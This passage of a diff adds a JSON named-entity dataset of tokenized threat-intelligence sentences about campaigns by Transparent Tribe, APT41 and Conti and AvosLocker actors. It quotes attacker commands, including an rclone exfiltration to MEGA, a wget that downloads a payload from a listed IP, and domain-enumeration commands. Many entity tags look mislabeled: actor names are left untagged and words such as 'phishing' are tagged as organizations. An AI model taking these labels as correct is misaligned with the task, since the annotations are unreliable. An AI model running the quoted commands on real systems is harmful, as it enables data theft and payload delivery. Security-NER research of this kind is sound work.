"O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0011,", + "Transparent", + "Tribe", + "established", + "SSL", + "certificates", + "on", + "the", + "typo-squatted", + "domains", + "the", + "group", + "registered." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0011,", + "Transparent", + "Tribe", + "registered", + "domains", + "likely", + "designed", + "to", + "appear", + "relevant", + "to", + "student", + "targets", + "in", + "India." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0011,", + "Transparent", + "Tribe", + "relied", + "on", + "a", + "student", + "target", + "to", + "open", + "a", + "malicious", + "document", + "delivered", + "via", + "email." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0011,", + "Transparent", + "Tribe", + "relied", + "on", + "student", + "targets", + "to", + "click", + "on", + "a", + "malicious", + "link", + "sent", + "via", + "email." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0011,", + "Transparent", + "Tribe", + "sent", + "malicious", + "attachments", + "via", + "email", + "to", + "student", + "targets", + "in", + "India." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0011,", + "Transparent", + "Tribe", + "sent", + "emails", + "containing", + "a", + "malicious", + "link", + "to", + "student", + "targets", + "in", + "India." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0011,", + "Transparent", + "Tribe", + "hosted", + "malicious", + "documents", + "on", + "domains", + "registered", + "by", + "the", + "group." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0011,", + "Transparent", + "Tribe", + "used", + "malicious", + "VBA", + "macros", + "within", + "a", + "lure", + "document", + "as", + "part", + "of", + "the", + "Crimson", + "malware", + "installation", + "process", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0015,", + "the", + "threat", + "actors", + "used", + "DLL", + "files", + "that", + "had", + "invalid", + "certificates." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "Conti", + "ransomware", + "to", + "encrypt", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "limited", + "Rclone's", + "bandwidth", + "setting", + "during", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "obtained", + "files", + "and", + "data", + "from", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "collected", + "files", + "from", + "network", + "shared", + "drives", + "prior", + "to", + "network", + "encryption." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "use", + "the", + "command", + "`net", + "group", + "\"domain", + "admins\"", + "/dom`", + "to", + "enumerate", + "domain", + "groups." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "the", + "command", + "`nltest", + "/domain_trusts", + "/all_trusts`", + "to", + "enumerate", + "domain", + "trusts." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "a", + "DLL", + "named", + "`D8B3.dll`", + "that", + "was", + "injected", + "into", + "the", + "Winlogon", + "process." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "exfiltrated", + "files", + "and", + "sensitive", + "data", + "to", + "the", + "MEGA", + "cloud", + "storage", + "site", + "using", + "the", + "Rclone", + "command", + "`rclone.exe", + "copy", + "--max-age", + "2y", + "\"\\\\SERVER\\Shares\"", + "Mega:DATA", + "-q", + "--ignore-existing", + "--auto-confirm", + "--multi-thread-streams", + "7", + "--transfers", + "7", + "--bwlimit", + "10M`." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "conducted", + "a", + "file", + "listing", + "discovery", + "against", + "multiple", + "hosts", + "to", + "ensure", + "locker", + "encryption", + "was", + "successful." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "downloaded", + "additional", + "tools", + "and", + "files", + "onto", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "a", + "malicious", + "HTA", + "file", + "that", + "contained", + "a", + "mix", + "of", + "encoded", + "HTML", + "and", + "JavaScript/VBScript", + "code." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "WMI", + "to", + "load", + "Cobalt", + "Strike", + "onto", + "additional", + "hosts", + "within", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "PowerView's", + "file", + "share", + "enumeration", + "results", + "were", + "stored", + "in", + "the", + "file", + "`c:\\ProgramData\\found_shares.txt`." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "the", + "command", + "`net", + "localgroup", + "\"adminstrator\"", + "`", + "to", + "identify", + "accounts", + "with", + "local", + "administrator", + "rights." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "relied", + "on", + "users", + "to", + "enable", + "macros", + "within", + "a", + "malicious", + "Microsoft", + "Word", + "document." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "For", + "C0015,", + "the", + "threat", + "actors", + "used", + "Cobalt", + "Strike", + "and", + "Conti", + "ransomware." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "named", + "a", + "binary", + "file", + "`compareForfor.jpg`", + "to", + "disguise", + "it", + "as", + "a", + "JPG", + "file." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "`mshta`", + "to", + "execute", + "DLLs." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "executed", + "the", + "PowerView", + "ShareFinder", + "module", + "to", + "identify", + "open", + "shares." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "Base64-encoded", + "strings." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "the", + "`tasklist", + "/s`", + "command", + "as", + "well", + "as", + "`taskmanager`", + "to", + "obtain", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "employed", + "code", + "that", + "used", + "`regsvr32`", + "for", + "execution." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "installed", + "the", + "AnyDesk", + "remote", + "desktop", + "application", + "onto", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "RDP", + "to", + "access", + "specific", + "network", + "hosts", + "of", + "interest." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "the", + "commands", + "`net", + "view", + "/all", + "/domain`", + "and", + "`ping`", + "to", + "discover", + "remote", + "systems.", + "They", + "also", + "used", + "PowerView's", + "PowerShell", + "Invoke-ShareFinder", + "script", + "for", + "file", + "share", + "enumeration." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "loaded", + "DLLs", + "via", + "`rundll32`", + "using", + "the", + "`svchost`", + "process." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "For", + "C0015,", + "security", + "researchers", + "assessed", + "the", + "threat", + "actors", + "likely", + "used", + "a", + "phishing", + "campaign", + "to", + "distribute", + "a", + "weaponized", + "attachment", + "to", + "victims." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "code", + "to", + "obtain", + "the", + "external", + "public-facing", + "IPv4", + "address", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "the", + "command", + "`net", + "view", + "/all", + "time`", + "to", + "gather", + "the", + "local", + "time", + "of", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0015,", + "the", + "threat", + "actors", + "obtained", + "a", + "variety", + "of", + "tools,", + "including", + "AdFind,", + "AnyDesk,", + "and", + "Process", + "Hacker." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "a", + "malicious", + "HTA", + "file", + "that", + "contained", + "a", + "mix", + "of", + "HTML", + "and", + "JavaScript/VBScript", + "code." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "`cmd.exe`", + "to", + "execute", + "commands", + "and", + "run", + "malicious", + "binaries." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0015,", + "the", + "threat", + "actors", + "used", + "`wmic`", + "and", + "`rundll32`", + "to", + "load", + "Cobalt", + "Strike", + "onto", + "a", + "target", + "host." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "a", + "ConfuserEx", + "obfuscated", + "BADPOTATO", + "exploit", + "to", + "abuse", + "named-pipe", + "impersonation", + "for", + "local", + "`NT", + "AUTHORITY\\SYSTEM`", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "hex-encoded", + "PII", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "collected", + "information", + "related", + "to", + "compromised", + "machines", + "as", + "well", + "as", + "Personal", + "Identifiable", + "Information", + "(PII)", + "from", + "victim", + "networks." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "dead", + "drop", + "resolvers", + "on", + "two", + "separate", + "tech", + "community", + "forums", + "for", + "their", + "KEYPLUG", + "Windows-version", + "backdoor;", + "notably", + "APT41", + "updated", + "the", + "community", + "forum", + "posts", + "frequently", + "with", + "new", + "dead", + "drop", + "resolvers", + "during", + "the", + "campaign." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "the", + "DUSTPAN", + "loader", + "to", + "decrypt", + "embedded", + "payloads." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "its", + "Cloudflare", + "services", + "C2", + "channels", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "exfiltrated", + "victim", + "data", + "via", + "DNS", + "lookups", + "by", + "encoding", + "and", + "prepending", + "it", + "as", + "subdomains", + "to", + "the", + "attacker-controlled", + "domain." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "Cloudflare", + "services", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "exploited", + "CVE-2021-44207", + "in", + "the", + "USAHerds", + "application", + "and", + "CVE-2021-44228", + "in", + "Log4j,", + "as", + "well", + "as", + "other", + ".NET", + "deserialization,", + "SQL", + "injection,", + "and", + "directory", + "traversal", + "vulnerabilities", + "to", + "gain", + "initial", + "access." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "abused", + "named", + "pipe", + "impersonation", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "established", + "persistence", + "by", + "loading", + "malicious", + "libraries", + "via", + "modifications", + "to", + "the", + "Import", + "Address", + "Table", + "(IAT)", + "within", + "legitimate", + "Microsoft", + "binaries." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "downloaded", + "malicious", + "payloads", + "onto", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "deployed", + "JScript", + "web", + "shells", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "copied", + "the", + "local", + "`SAM`", + "and", + "`SYSTEM`", + "Registry", + "hives", + "to", + "a", + "staging", + "directory." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "`SCHTASKS", + "/Change`", + "to", + "modify", + "legitimate", + "scheduled", + "tasks", + "to", + "run", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "file", + "names", + "beginning", + "with", + "USERS,", + "SYSUSER,", + "and", + "SYSLOG", + "for", + "DEADEYE,", + "and", + "changed", + "KEYPLUG", + "file", + "extensions", + "from", + ".vmp", + "to", + ".upx", + "likely", + "to", + "avoid", + "hunting", + "detections." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "broke", + "malicious", + "binaries,", + "including", + "DEADEYE", + "and", + "KEYPLUG,", + "into", + "multiple", + "sections", + "on", + "disk", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "frequently", + "configured", + "the", + "URL", + "endpoints", + "of", + "their", + "stealthy", + "passive", + "backdoor", + "LOWKEY.PASSIVE", + "to", + "masquerade", + "as", + "normal", + "web", + "application", + "traffic", + "on", + "an", + "infected", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "the", + "Cloudflare", + "CDN", + "to", + "proxy", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "the", + "following", + "Windows", + "scheduled", + "tasks", + "for", + "DEADEYE", + "dropper", + "persistence", + "on", + "US", + "state", + "government", + "networks:", + "`\\Microsoft\\Windows\\PLA\\Server", + "Manager", + "Performance", + "Monitor`,", + "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", + "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", + "and", + "`\\Microsoft\\Windows\\WDI\\USOShared`." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "copied", + "the", + "`SAM`", + "and", + "`SYSTEM`", + "Registry", + "hives", + "for", + "credential", + "harvesting." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "VMProtect", + "to", + "slow", + "the", + "reverse", + "engineering", + "of", + "malicious", + "binaries." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "issued", + "`ping", + "-n", + "1", + "((cmd", + "/c", + "dir", + "c:\\|findstr", + "Number).split()[-1]+`", + "commands", + "to", + "find", + "the", + "volume", + "serial", + "number", + "of", + "compromised", + "systems." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "`cmd.exe", + "/c", + "ping", + "%userdomain%`", + "for", + "discovery." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "`whoami`", + "to", + "gather", + "information", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "C0017,", + "APT41", + "obtained", + "publicly", + "available", + "tools", + "such", + "as", + "YSoSerial.NET,", + "ConfuserEx,", + "and", + "BadPotato." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "ran", + "`wget", + "http://103.224.80[.]44:8080/kernel`", + "to", + "download", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "the", + "Cloudflare", + "services", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "deployed", + "JScript", + "web", + "shells", + "through", + "the", + "creation", + "of", + "malicious", + "ViewState", + "objects." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0017,", + "APT41", + "used", + "`cmd.exe`", + "to", + "execute", + "reconnaissance", + "commands." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "Base64", + "to", + "encode", + "their", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "used", + "AvosLocker", + "ransomware", + "to", + "encrypt", + "files", + "on", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "exploited", + "VMWare", + "Horizon", + "Unified", + "Access", + "Gateways", + "that", + "were", + "vulnerable", + "to", + "several", + "Log4Shell", + "vulnerabilities,", + "including", + "CVE-2021-44228,", + "CVE-2021-45046,", + "CVE-2021-45105,", + "and", + "CVE-2021-44832." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "downloaded", + "additional", + "tools,", + "such", + "as", + "Mimikatz", + "and", + "Sliver,", + "as", + "well", + "as", + "Cobalt", + "Strike", + "and", + "AvosLocker", + "ransomware", + "onto", + "the", + "victim", + "network." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "C0018,", + "the", + "threat", + "actors", + "transferred", + "the", + "SoftPerfect", + "Network", + "Scanner", + 